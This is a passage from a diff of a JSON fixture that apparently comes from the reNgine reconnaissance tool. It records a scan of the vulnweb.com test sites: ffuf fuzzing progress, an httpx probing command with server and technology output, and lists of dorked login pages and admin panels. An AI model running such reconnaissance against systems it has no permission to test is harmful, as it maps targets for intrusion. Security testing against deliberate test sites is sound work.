Job [1/1] :: 123 req/sec :: Duration: [0:00:21] :: Errors: 0 ::\n\u001b[2K:: Progress: [2450/4842] :: Job [1/1] :: 125 req/sec :: Duration: [0:00:21] :: Errors: 0 ::\n\u001b[2K:: Progress: [2465/4842] :: Job [1/1] :: 120 req/sec :: Duration: [0:00:21] :: Errors: 0 ::\n\u001b[2K:: Progress: [2482/4842] :: Job [1/1] :: 124 req/sec :: Duration: [0:00:21] :: Errors: 0 ::\n\u001b[2K:: Progress: [2495/4842] :: Job [1/1] :: 119 req/sec :: Duration: [0:00:22] :: Errors: 0 ::\n\u001b[2K:: Progress: [2515/4842] :: Job [1/1] :: 121 req/sec :: Duration: [0:00:22] :: Errors: 0 ::\n\u001b[2K:: Progress: [2529/4842] :: Job [1/1] :: 120 req/sec :: Duration: [0:00:22] :: Errors: 0 ::\n\u001b[2K:: Progress: [2540/4842] :: Job [1/1] :: 118 req/sec :: Duration: [0:00:22] :: Errors: 0 ::\n\u001b[2K:: Progress: [2554/4842] :: Job [1/1] :: 119 req/sec :: Duration: [0:00:22] :: Errors: 0 ::\n\u001b[2K:: Progress: [2569/4842] :: Job [1/1] :: 120 req/sec :: Duration: [0:00:22] :: Errors: 0 ::\n\u001b[2K:: Progress: [2589/4842] :: Job [1/1] :: 123 req/sec :: Duration: [0:00:22] :: Errors: 0 ::\n\u001b[2K:: Progress: [2599/4842] :: Job [1/1] :: 119 req/sec :: Duration: [0:00:22] :: Errors: 0 ::\n\u001b[2K:: Progress: [2616/4842] :: Job [1/1] :: 125 req/sec :: Duration: [0:00:23] :: Errors: 0 ::\n\u001b[2K{\"input\":{\"FFUFHASH\":\"MzVhZjhhMjU=\",\"FUZZ\":\"aW5kZXguaHRtbA==\"},\"position\":2597,\"status\":200,\"length\":4018,\"words\":482,\"lines\":74,\"content-type\":\"text/html\",\"redirectlocation\":\"\",\"url\":\"http://www.vulnweb.com/index.html\",\"duration\":177164925,\"scraper\":{},\"resultfile\":\"\",\"host\":\"www.vulnweb.com\"}\n\n\u001b[2K:: Progress: [2619/4842] :: Job [1/1] :: 120 req/sec :: Duration: [0:00:23] :: Errors: 0 ::\n\u001b[2K:: Progress: [2630/4842] :: Job [1/1] :: 118 req/sec :: Duration: [0:00:23] :: Errors: 0 ::\n\u001b[2K:: Progress: [2646/4842] :: Job [1/1] :: 121 req/sec :: Duration: [0:00:23] :: Errors: 0 ::\n\u001b[2K:: Progress: [2663/4842] :: Job [1/1] :: 118 req/sec :: Duration: [0:00:23] :: Errors: 0 ::\n\u001b[2K:: Progress: [2679/4842] :: Job [1/1] :: 122 req/sec :: Duration: [0:00:23] :: Errors: 0 ::\n\u001b[2K:: Progress: [2692/4842] :: Job [1/1] :: 125 req/sec :: Duration: [0:00:23] :: Errors: 0 ::\n\u001b[2K:: Progress: [2707/4842] :: Job [1/1] :: 121 req/sec :: Duration: [0:00:23] :: Errors: 0 ::\n\u001b[2K:: Progress: [2725/4842] :: Job [1/1] :: 126 req/sec :: Duration: [0:00:23] :: Errors: 0 ::\n\u001b[2K:: Progress: [2737/4842] :: Job [1/1] :: 119 req/sec :: Duration: [0:00:24] :: Errors: 0 ::\n\u001b[2K:: Progress: [2757/4842] :: Job [1/1] :: 124 req/sec :: Duration: [0:00:24] :: Errors: 0 ::\n\u001b[2K:: Progress: [2769/4842] :: Job [1/1] :: 123 req/sec :: Duration: [0:00:24] :: Errors: 0 ::\n\u001b[2K:: Progress: [2786/4842] :: Job [1/1] :: 124 req/sec :: Duration: [0:00:24] :: Errors: 0 ::\n\u001b[2K:: Progress: [2803/4842] :: Job [1/1] :: 127 req/sec :: Duration: [0:00:24] :: Errors: 0 ::\n\u001b[2K:: Progress: [2819/4842] :: Job [1/1] :: 124 req/sec :: Duration: [0:00:24] :: Errors: 0 ::\n\u001b[2K:: Progress: [2834/4842] :: Job [1/1] :: 130 req/sec :: Duration: [0:00:24] :: Errors: 0 ::\n\u001b[2K:: Progress: [2846/4842] :: Job [1/1] :: 123 req/sec :: Duration: [0:00:24] :: Errors: 0 ::\n\u001b[2K:: Progress: [2862/4842] :: Job [1/1] :: 128 req/sec :: Duration: [0:00:25] :: Errors: 0 ::\n\u001b[2K:: Progress: [2876/4842] :: Job [1/1] :: 120 req/sec :: Duration: [0:00:25] :: Errors: 0 ::\n\u001b[2K:: Progress: [2893/4842] :: Job [1/1] :: 125 req/sec :: Duration: [0:00:25] :: Errors: 0 ::\n\u001b[2K:: Progress: [2902/4842] :: Job [1/1] :: 116 req/sec :: Duration: [0:00:25] :: Errors: 0 ::\n\u001b[2K:: Progress: [2921/4842] :: Job [1/1] :: 122 req/sec :: Duration: [0:00:25] :: Errors: 0 ::\n\u001b[2K:: Progress: [2931/4842] :: Job [1/1] :: 114 req/sec :: Duration: [0:00:25] :: Errors: 0 ::\n\u001b[2K:: Progress: [2948/4842] :: Job [1/1] :: 121 req/sec :: Duration: [0:00:25] :: Errors: 0 ::\n\u001b[2K:: Progress: [2968/4842] :: Job [1/1] :: 119 req/sec :: Duration: [0:00:25] :: Errors: 0 ::\n\u001b[2K:: Progress: [2976/4842] :: Job [1/1] :: 119 req/sec :: Duration: [0:00:26] :: Errors: 0 ::\n\u001b[2K:: Progress: [2998/4842] :: Job [1/1] :: 125 req/sec :: Duration: [0:00:26] :: Errors: 0 ::\n\u001b[2K:: Progress: [3005/4842] :: Job [1/1] :: 117 req/sec :: Duration: [0:00:26] :: Errors: 0 ::\n\u001b[2K:: Progress: [3027/4842] :: Job [1/1] :: 126 req/sec :: Duration: [0:00:26] :: Errors: 0 ::\n\u001b[2K:: Progress: [3038/4842] :: Job [1/1] :: 119 req/sec :: Duration: [0:00:26] :: Errors: 0 ::\n\u001b[2K:: Progress: [3052/4842] :: Job [1/1] :: 122 req/sec :: Duration: [0:00:26] :: Errors: 0 ::\n\u001b[2K:: Progress: [3067/4842] :: Job [1/1] :: 117 req/sec :: Duration: [0:00:26] :: Errors: 0 ::\n\u001b[2K:: Progress: [3082/4842] :: Job [1/1] :: 122 req/sec :: Duration: [0:00:26] :: Errors: 0 ::\n\u001b[2K:: Progress: [3092/4842] :: Job [1/1] :: 114 req/sec :: Duration: [0:00:27] :: Errors: 0 ::\n\u001b[2K:: Progress: [3111/4842] :: Job [1/1] :: 123 req/sec :: Duration: [0:00:27] :: Errors: 0 ::\n\u001b[2K:: Progress: [3123/4842] :: Job [1/1] :: 113 req/sec :: Duration: [0:00:27] :: Errors: 0 ::\n\u001b[2K:: Progress: [3137/4842] :: Job [1/1] :: 116 req/sec :: Duration: [0:00:27] :: Errors: 0 ::\n\u001b[2K:: Progress: [3157/4842] :: Job [1/1] :: 121 req/sec :: Duration: [0:00:27] :: Errors: 0 ::\n\u001b[2K:: Progress: [3163/4842] :: Job [1/1] :: 113 req/sec :: Duration: [0:00:27] :: Errors: 0 ::\n\u001b[2K:: Progress: [3185/4842] :: Job [1/1] :: 121 req/sec :: Duration: [0:00:27] :: Errors: 0 ::\n\u001b[2K:: Progress: [3196/4842] :: Job [1/1] :: 113 req/sec :: Duration: [0:00:27] :: Errors: 0 ::\n\u001b[2K:: Progress: [3213/4842] :: Job [1/1] :: 121 req/sec :: Duration: [0:00:28] :: Errors: 0 ::\n\u001b[2K:: Progress: [3224/4842] :: Job [1/1] :: 114 req/sec :: Duration: [0:00:28] :: Errors: 0 ::\n\u001b[2K:: Progress: [3239/4842] :: Job [1/1] :: 115 req/sec :: Duration: [0:00:28] :: Errors: 0 ::\n\u001b[2K:: Progress: [3249/4842] :: Job [1/1] :: 111 req/sec :: Duration: [0:00:28] :: Errors: 0 ::\n\u001b[2K:: Progress: [3266/4842] :: Job [1/1] :: 117 req/sec :: Duration: [0:00:28] :: Errors: 0 ::\n\u001b[2K:: Progress: [3288/4842] :: Job [1/1] :: 125 req/sec :: Duration: [0:00:28] :: Errors: 0 ::\n\u001b[2K:: Progress: [3297/4842] :: Job [1/1] :: 117 req/sec :: Duration: [0:00:28] :: Errors: 0 ::\n\u001b[2K:: Progress: [3320/4842] :: Job [1/1] :: 125 req/sec :: Duration: [0:00:28] :: Errors: 0 ::\n\u001b[2K:: Progress: [3325/4842] :: Job [1/1] :: 120 req/sec :: Duration: [0:00:29] :: Errors: 0 ::\n\u001b[2K:: Progress: [3350/4842] :: Job [1/1] :: 124 req/sec :: Duration: [0:00:29] :: Errors: 0 ::\n\u001b[2K:: Progress: [3361/4842] :: Job [1/1] :: 117 req/sec :: Duration: [0:00:29] :: Errors: 0 ::\n\u001b[2K:: Progress: [3377/4842] :: Job [1/1] :: 125 req/sec :: Duration: [0:00:29] :: Errors: 0 ::\n\u001b[2K:: Progress: [3388/4842] :: Job [1/1] :: 123 req/sec :: Duration: [0:00:29] :: Errors: 0 ::\n\u001b[2K:: Progress: [3403/4842] :: Job [1/1] :: 122 req/sec :: Duration: [0:00:29] :: Errors: 0 ::\n\u001b[2K:: Progress: [3418/4842] :: Job [1/1] :: 122 req/sec :: Duration: [0:00:29] :: Errors: 0 ::\n\u001b[2K:: Progress: [3432/4842] :: Job [1/1] :: 119 req/sec :: Duration: [0:00:29] :: Errors: 0 ::\n\u001b[2K:: Progress: [3443/4842] :: Job [1/1] :: 126 req/sec :: Duration: [0:00:30] :: Errors: 0 ::\n\u001b[2K:: Progress: [3463/4842] :: Job [1/1] :: 116 req/sec :: Duration: [0:00:30] :: Errors: 0 ::\n\u001b[2K:: Progress: [3471/4842] :: Job [1/1] :: 113 req/sec :: Duration: [0:00:30] :: Errors: 0 ::\n\u001b[2K:: Progress: [3496/4842] :: Job [1/1] :: 115 req/sec :: Duration: [0:00:30] :: Errors: 0 ::\n\u001b[2K:: Progress: [3512/4842] :: Job [1/1] :: 122 req/sec :: Duration: [0:00:30] :: Errors: 0 ::\n\u001b[2K:: Progress: [3521/4842] :: Job [1/1] :: 112 req/sec :: Duration: [0:00:30] :: Errors: 0 ::\n\u001b[2K:: Progress: [3536/4842] :: Job [1/1] :: 117 req/sec :: Duration: [0:00:30] :: Errors: 0 ::\n\u001b[2K:: Progress: [3545/4842] :: Job [1/1] :: 113 req/sec :: Duration: [0:00:30] :: Errors: 0 ::\n\u001b[2K:: Progress: [3566/4842] :: Job [1/1] :: 123 req/sec :: Duration: [0:00:31] :: Errors: 0 ::\n\u001b[2K:: Progress: [3576/4842] :: Job [1/1] :: 111 req/sec :: Duration: [0:00:31] :: Errors: 0 ::\n\u001b[2K:: Progress: [3596/4842] :: Job [1/1] :: 129 req/sec :: Duration: [0:00:31] :: Errors: 0 ::\n\u001b[2K:: Progress: [3606/4842] :: Job [1/1] :: 114 req/sec :: Duration: [0:00:31] :: Errors: 0 ::\n\u001b[2K:: Progress: [3633/4842] :: Job [1/1] :: 121 req/sec :: Duration: [0:00:31] :: Errors: 0 ::\n\u001b[2K:: Progress: [3639/4842] :: Job [1/1] :: 118 req/sec :: Duration: [0:00:31] :: Errors: 0 ::\n\u001b[2K:: Progress: [3665/4842] :: Job [1/1] :: 132 req/sec :: Duration: [0:00:31] :: Errors: 0 ::\n\u001b[2K:: Progress: [3685/4842] :: Job [1/1] :: 130 req/sec :: Duration: [0:00:31] :: Errors: 0 ::\n\u001b[2K:: Progress: [3695/4842] :: Job [1/1] :: 136 req/sec :: Duration: [0:00:32] :: Errors: 0 ::\n\u001b[2K:: Progress: [3716/4842] :: Job [1/1] :: 139 req/sec :: Duration: [0:00:32] :: Errors: 0 ::\n\u001b[2K:: Progress: [3725/4842] :: Job [1/1] :: 137 req/sec :: Duration: [0:00:32] :: Errors: 0 ::\n\u001b[2K:: Progress: [3747/4842] :: Job [1/1] :: 134 req/sec :: Duration: [0:00:32] :: Errors: 0 ::\n\u001b[2K:: Progress: [3756/4842] :: Job [1/1] :: 137 req/sec :: Duration: [0:00:32] :: Errors: 0 ::\n\u001b[2K:: Progress: [3777/4842] :: Job [1/1] :: 135 req/sec :: Duration: [0:00:32] :: Errors: 0 ::\n\u001b[2K:: Progress: [3786/4842] :: Job [1/1] :: 137 req/sec :: Duration: [0:00:32] :: Errors: 0 ::\n\u001b[2K:: Progress: [3813/4842] :: Job [1/1] :: 130 req/sec :: Duration: [0:00:32] :: Errors: 0 ::\n\u001b[2K:: Progress: [3816/4842] :: Job [1/1] :: 136 req/sec :: Duration: [0:00:33] :: Errors: 0 ::\n\u001b[2K:: Progress: [3844/4842] :: Job [1/1] :: 133 req/sec :: Duration: [0:00:33] :: Errors: 0 ::\n\u001b[2K:: Progress: [3866/4842] :: Job [1/1] :: 139 req/sec :: Duration: [0:00:33] :: Errors: 0 ::\n\u001b[2K:: Progress: [3875/4842] :: Job [1/1] :: 135 req/sec :: Duration: [0:00:33] :: Errors: 0 ::\n\u001b[2K:: Progress: [3896/4842] :: Job [1/1] :: 139 req/sec :: Duration: [0:00:33] :: Errors: 0 ::\n\u001b[2K:: Progress: [3904/4842] :: Job [1/1] :: 127 req/sec :: Duration: [0:00:33] :: Errors: 0 ::\n\u001b[2K:: Progress: [3925/4842] :: Job [1/1] :: 133 req/sec :: Duration: [0:00:33] :: Errors: 0 ::\n\u001b[2K:: Progress: [3931/4842] :: Job [1/1] :: 126 req/sec :: Duration: [0:00:33] :: Errors: 0 ::\n\u001b[2K:: Progress: [3956/4842] :: Job [1/1] :: 127 req/sec :: Duration: [0:00:34] :: Errors: 0 ::\n\u001b[2K:: Progress: [3962/4842] :: Job [1/1] :: 121 req/sec :: Duration: [0:00:34] :: Errors: 0 ::\n\u001b[2K:: Progress: [3970/4842] :: Job [1/1] :: 120 req/sec :: Duration: [0:00:34] :: Errors: 0 ::\n\u001b[2K:: Progress: [3976/4842] :: Job [1/1] :: 109 req/sec :: Duration: [0:00:34] :: Errors: 0 ::\n\u001b[2K:: Progress: [3986/4842] :: Job [1/1] :: 104 req/sec :: Duration: [0:00:34] :: Errors: 0 ::\n\u001b[2K:: Progress: [4002/4842] :: Job [1/1] :: 107 req/sec :: Duration: [0:00:34] :: Errors: 0 ::\n\u001b[2K:: Progress: [4010/4842] :: Job [1/1] :: 101 req/sec :: Duration: [0:00:34] :: Errors: 0 ::\n\u001b[2K:: Progress: [4029/4842] :: Job [1/1] :: 105 req/sec :: Duration: [0:00:34] :: Errors: 0 ::\n\u001b[2K:: Progress: [4042/4842] :: Job [1/1] :: 97 req/sec :: Duration: [0:00:35] :: Errors: 0 ::\n\u001b[2K:: Progress: [4058/4842] :: Job [1/1] :: 105 req/sec :: Duration: [0:00:35] :: Errors: 0 ::\n\u001b[2K:: Progress: [4080/4842] :: Job [1/1] :: 105 req/sec :: Duration: [0:00:35] :: Errors: 0 ::\n\u001b[2K:: Progress: [4089/4842] :: Job [1/1] :: 101 req/sec :: Duration: [0:00:35] :: Errors: 0 ::\n\u001b[2K:: Progress: [4112/4842] :: Job [1/1] :: 109 req/sec :: Duration: [0:00:35] :: Errors: 0 ::\n\u001b[2K:: Progress: [4120/4842] :: Job [1/1] :: 109 req/sec :: Duration: [0:00:35] :: Errors: 0 ::\n\u001b[2K:: Progress: [4142/4842] :: Job [1/1] :: 128 req/sec :: Duration: [0:00:35] :: Errors: 0 ::\n\u001b[2K:: Progress: [4156/4842] :: Job [1/1] :: 127 req/sec :: Duration: [0:00:35] :: Errors: 0 ::\n\u001b[2K:: Progress: [4175/4842] :: Job [1/1] :: 130 req/sec :: Duration: [0:00:36] :: Errors: 0 ::\n\u001b[2K:: Progress: [4186/4842] :: Job [1/1] :: 131 req/sec :: Duration: [0:00:36] :: Errors: 0 ::\n\u001b[2K:: Progress: [4201/4842] :: Job [1/1] :: 124 req/sec :: Duration: [0:00:36] :: Errors: 0 ::\n\u001b[2K:: Progress: [4211/4842] :: Job [1/1] :: 123 req/sec :: Duration: [0:00:36] :: Errors: 0 ::\n\u001b[2K:: Progress: [4226/4842] :: Job [1/1] :: 122 req/sec :: Duration: [0:00:36] :: Errors: 0 ::\n\u001b[2K:: Progress: [4246/4842] :: Job [1/1] :: 126 req/sec :: Duration: [0:00:36] :: Errors: 0 ::\n\u001b[2K:: Progress: [4254/4842] :: Job [1/1] :: 118 req/sec :: Duration: [0:00:36] :: Errors: 0 ::\n\u001b[2K:: Progress: [4273/4842] :: Job [1/1] :: 120 req/sec :: Duration: [0:00:36] :: Errors: 0 ::\n\u001b[2K:: Progress: [4284/4842] :: Job [1/1] :: 117 req/sec :: Duration: [0:00:37] :: Errors: 0 ::\n\u001b[2K:: Progress: [4304/4842] :: Job [1/1] :: 121 req/sec :: Duration: [0:00:37] :: Errors: 0 ::\n\u001b[2K:: Progress: [4319/4842] :: Job [1/1] :: 114 req/sec :: Duration: [0:00:37] :: Errors: 0 ::\n\u001b[2K:: Progress: [4337/4842] :: Job [1/1] :: 122 req/sec :: Duration: [0:00:37] :: Errors: 0 ::\n\u001b[2K:: Progress: [4357/4842] :: Job [1/1] :: 125 req/sec :: Duration: [0:00:37] :: Errors: 0 ::\n\u001b[2K:: Progress: [4370/4842] :: Job [1/1] :: 124 req/sec :: Duration: [0:00:37] :: Errors: 0 ::\n\u001b[2K:: Progress: [4388/4842] :: Job [1/1] :: 132 req/sec :: Duration: [0:00:37] :: Errors: 0 ::\n\u001b[2K:: Progress: [4402/4842] :: Job [1/1] :: 132 req/sec :: Duration: [0:00:37] :: Errors: 0 ::\n\u001b[2K:: Progress: [4422/4842] :: Job [1/1] :: 133 req/sec :: Duration: [0:00:38] :: Errors: 0 ::\n\u001b[2K:: Progress: [4432/4842] :: Job [1/1] :: 130 req/sec :: Duration: [0:00:38] :: Errors: 0 ::\n\u001b[2K:: Progress: [4453/4842] :: Job [1/1] :: 133 req/sec :: Duration: [0:00:38] :: Errors: 0 ::\n\u001b[2K:: Progress: [4462/4842] :: Job [1/1] :: 131 req/sec :: Duration: [0:00:38] :: Errors: 0 ::\n\u001b[2K:: Progress: [4485/4842] :: Job [1/1] :: 133 req/sec :: Duration: [0:00:38] :: Errors: 0 ::\n\u001b[2K:: Progress: [4502/4842] :: Job [1/1] :: 132 req/sec :: Duration: [0:00:38] :: Errors: 0 ::\n\u001b[2K:: Progress: [4516/4842] :: Job [1/1] :: 131 req/sec :: Duration: [0:00:38] :: Errors: 0 ::\n\u001b[2K:: Progress: [4534/4842] :: Job [1/1] :: 132 req/sec :: Duration: [0:00:38] :: Errors: 0 ::\n\u001b[2K:: Progress: [4549/4842] :: Job [1/1] :: 131 req/sec :: Duration: [0:00:39] :: Errors: 0 ::\n\u001b[2K:: Progress: [4568/4842] :: Job [1/1] :: 131 req/sec :: Duration: [0:00:39] :: Errors: 0 ::\n\u001b[2K:: Progress: [4576/4842] :: Job [1/1] :: 125 req/sec :: Duration: [0:00:39] :: Errors: 0 ::\n\u001b[2K:: Progress: [4594/4842] :: Job [1/1] :: 129 req/sec :: Duration: [0:00:39] :: Errors: 0 ::\n\u001b[2K:: Progress: [4605/4842] :: Job [1/1] :: 121 req/sec :: Duration: [0:00:39] :: Errors: 0 ::\n\u001b[2K:: Progress: [4615/4842] :: Job [1/1] :: 123 req/sec :: Duration: [0:00:39] :: Errors: 0 ::\n\u001b[2K:: Progress: [4627/4842] :: Job [1/1] :: 116 req/sec :: Duration: [0:00:39] :: Errors: 0 ::\n\u001b[2K:: Progress: [4638/4842] :: Job [1/1] :: 111 req/sec :: Duration: [0:00:39] :: Errors: 0 ::\n\u001b[2K:: Progress: [4660/4842] :: Job [1/1] :: 112 req/sec :: Duration: [0:00:40] :: Errors: 0 ::\n\u001b[2K:: Progress: [4668/4842] :: Job [1/1] :: 111 req/sec :: Duration: [0:00:40] :: Errors: 0 ::\n\u001b[2K:: Progress: [4687/4842] :: Job [1/1] :: 112 req/sec :: Duration: [0:00:40] :: Errors: 0 ::\n\u001b[2K:: Progress: [4694/4842] :: Job [1/1] :: 108 req/sec :: Duration: [0:00:40] :: Errors: 0 ::\n\u001b[2K:: Progress: [4717/4842] :: Job [1/1] :: 109 req/sec :: Duration: [0:00:40] :: Errors: 0 ::\n\u001b[2K:: Progress: [4734/4842] :: Job [1/1] :: 113 req/sec :: Duration: [0:00:40] :: Errors: 0 ::\n\u001b[2K:: Progress: [4748/4842] :: Job [1/1] :: 116 req/sec :: Duration: [0:00:40] :: Errors: 0 ::\n\u001b[2K:: Progress: [4769/4842] :: Job [1/1] :: 124 req/sec :: Duration: [0:00:40] :: Errors: 0 ::\n\u001b[2K:: Progress: [4780/4842] :: Job [1/1] :: 125 req/sec :: Duration: [0:00:41] :: Errors: 0 ::\n\u001b[2K:: Progress: [4800/4842] :: Job [1/1] :: 124 req/sec :: Duration: [0:00:41] :: Errors: 0 ::\n\u001b[2K:: Progress: [4810/4842] :: Job [1/1] :: 125 req/sec :: Duration: [0:00:41] :: Errors: 0 ::\n\u001b[2K:: Progress: [4833/4842] :: Job [1/1] :: 128 req/sec :: Duration: [0:00:41] :: Errors: 0 ::\n\u001b[2K:: Progress: [4842/4842] :: Job [1/1] :: 123 req/sec :: Duration: [0:00:41] :: Errors: 0 ::\n\u001b[2K:: Progress: [4842/4842] :: Job [1/1] :: 110 req/sec :: Duration: [0:00:41] :: Errors: 0 ::\n", + "time": "2024-11-13T02:40:00.587Z" } }, { - "model": "startScan.dork", - "pk": 15, + "model": "startScan.command", + "pk": 114, "fields": { - "type": "login_pages", - "url": "http://testphp.vulnweb.com/listproducts.php?cat=1" + "scan_history": 1, + "activity": null, + "command": "httpx -cl -ct -rt -location -td -websocket -cname -asn -cdn -probe -random-agent -t 7 -json -l /home/rengine/scan_results/vulnweb.com/scans/956910ad-a163-11ef-b299-e5f7db5e340b/httpx_input.txt -silent", + "return_code": 0, + "output": "{\"timestamp\":\"2024-11-13T02:40:53.766671672Z\",\"port\":\"80\",\"url\":\"http://rest.vulnweb.com\",\"input\":\"http://rest.vulnweb.com\",\"title\":\"Invicti Vulnerable REST API\",\"scheme\":\"http\",\"webserver\":\"Apache/2.4.25 (Debian)\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"18.215.71.186\",\"path\":\"/\",\"time\":\"204.460651ms\",\"a\":[\"18.215.71.186\"],\"tech\":[\"Apache HTTP Server:2.4.25\",\"Debian\",\"PHP:7.1.26\"],\"words\":1398,\"lines\":138,\"status_code\":200,\"content_length\":3556,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:40:53.917838287Z\",\"port\":\"80\",\"url\":\"http://vulnweb.com\",\"input\":\"http://vulnweb.com\",\"title\":\"Acunetix Web Vulnerability Scanner - Test websites\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/\",\"time\":\"351.930968ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":482,\"lines\":74,\"status_code\":200,\"content_length\":4018,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:40:53.928846205Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com\",\"input\":\"http://testasp.vulnweb.com\",\"title\":\"acuforum forums\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/\",\"time\":\"359.268385ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"DreamWeaver\",\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":328,\"lines\":46,\"status_code\":200,\"content_length\":3541,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:40:53.93258783Z\",\"port\":\"80\",\"url\":\"http://www.vulnweb.com\",\"input\":\"http://www.vulnweb.com\",\"title\":\"Acunetix Web Vulnerability Scanner - Test websites\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/\",\"time\":\"362.490225ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":482,\"lines\":74,\"status_code\":200,\"content_length\":4018,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:40:53.941572332Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com\",\"input\":\"http://testphp.vulnweb.com\",\"title\":\"Home of Acunetix Art\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/\",\"time\":\"365.941337ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":514,\"lines\":110,\"status_code\":200,\"content_length\":4958,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:40:53.94630636Z\",\"port\":\"80\",\"url\":\"http://testhtml5.vulnweb.com\",\"input\":\"http://testhtml5.vulnweb.com\",\"title\":\"SecurityTweets - HTML5 test website for Acunetix Web Vulnerability Scanner\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/\",\"time\":\"365.578064ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"AngularJS\",\"Nginx:1.19.0\"],\"words\":1483,\"lines\":164,\"status_code\":200,\"content_length\":6940,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:40:54.932415879Z\",\"port\":\"80\",\"url\":\"http://testaspnet.vulnweb.com\",\"input\":\"http://testaspnet.vulnweb.com\",\"title\":\"acublog news\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/\",\"time\":\"1.325135154s\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET:2.0.50727\",\"Microsoft Visual Studio\",\"Windows Server\"],\"words\":774,\"lines\":89,\"status_code\":200,\"content_length\":14069,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n", + "time": "2024-11-13T02:40:42.604Z" } }, { - "model": "startScan.dork", - "pk": 16, + "model": "startScan.command", + "pk": 115, "fields": { - "type": "login_pages", - "url": "http://testphp.vulnweb.com/login.php" + "scan_history": 1, + "activity": null, + "command": "rm /home/rengine/scan_results/vulnweb.com/scans/956910ad-a163-11ef-b299-e5f7db5e340b/httpx_input.txt", + "return_code": 0, + "output": "", + "time": "2024-11-13T02:40:55.090Z" } }, { - "model": "startScan.dork", - "pk": 17, + "model": "startScan.technology", + "pk": 1, "fields": { - "type": "login_pages", - "url": "http://testphp.vulnweb.com/search.php" + "name": "Nginx:1.19.0" } }, { - "model": "startScan.dork", - "pk": 18, + "model": "startScan.technology", + "pk": 2, "fields": { - "type": "login_pages", - "url": "http://www.vulnweb.com/" + "name": "Apache HTTP Server:2.4.25" } }, { - "model": "startScan.dork", - "pk": 19, + "model": "startScan.technology", + "pk": 3, "fields": { - "type": "admin_panels", - "url": "http://rest.vulnweb.com/basic_authentication/api/" + "name": "Debian" } }, { - "model": "startScan.dork", - "pk": 20, + "model": "startScan.technology", + "pk": 4, "fields": { - "type": "admin_panels", - "url": "http://rest.vulnweb.com/docs/" + "name": "PHP:7.1.26" } }, { - "model": "startScan.dork", - "pk": 21, + "model": "startScan.technology", + "pk": 5, "fields": { - "type": "admin_panels", - "url": "http://rest.vulnweb.com/images/1_basic_authentication.png" + "name": "DreamWeaver" } }, { - "model": "startScan.dork", - "pk": 22, + "model": "startScan.technology", + "pk": 6, "fields": { - "type": "admin_panels", - "url": "http://rest.vulnweb.com/images/2_jwt.png" + "name": "IIS:8.5" } }, { - "model": "startScan.dork", - "pk": 23, + "model": "startScan.technology", + "pk": 7, + "fields": { + "name": "Microsoft ASP.NET" + } +}, +{ + "model": "startScan.technology", + "pk": 8, "fields": { - "type": "admin_panels", - "url": "http://rest.vulnweb.com/images/3_oauth2.png" + "name": "Windows Server" } }, { - "model": "startScan.dork", - "pk": 24, + "model": "startScan.technology", + "pk": 9, "fields": { - "type": "admin_panels", - "url": "http://testphp.vulnweb.com/admin/" + "name": "PHP:5.6.40" } }, { - "model": "startScan.dork", - "pk": 25, + "model": "startScan.technology", + "pk": 10, "fields": { - "type": "admin_panels", - "url": "http://testphp.vulnweb.com/login.php" + "name": "Ubuntu" } }, { - "model": "startScan.dork", - "pk": 26, + "model": "startScan.technology", + "pk": 11, "fields": { - "type": "admin_panels", - "url": "http://testphp.vulnweb.com/secured/phpinfo.php" + "name": "AngularJS" } }, { - "model": "startScan.dork", - "pk": 27, + "model": "startScan.technology", + "pk": 12, "fields": { - "type": "social_media", - "url": "https://m.facebook.com/QwertyAloneC/posts/dork-sqli-just-add-inurl-before-themphpcatidcartphpidphpcidindexphpshowtopiccont/142828509609539/" + "name": "Microsoft ASP.NET:2.0.50727" } }, { - "model": "startScan.dork", - "pk": 28, + "model": "startScan.technology", + "pk": 13, "fields": { - "type": "social_media", - "url": "https://m.facebook.com/groups/3201261889909211/posts/3624197390948990/" + "name": "Microsoft Visual Studio" } }, { - "model": "startScan.dork", - "pk": 29, + "model": "startScan.technology", + "pk": 14, "fields": { - "type": "social_media", - "url": "https://m.facebook.com/groups/3201261889909211/posts/4007010936000965/" + "name": "Bootstrap" } }, { - "model": "startScan.dork", - "pk": 30, + "model": "startScan.technology", + 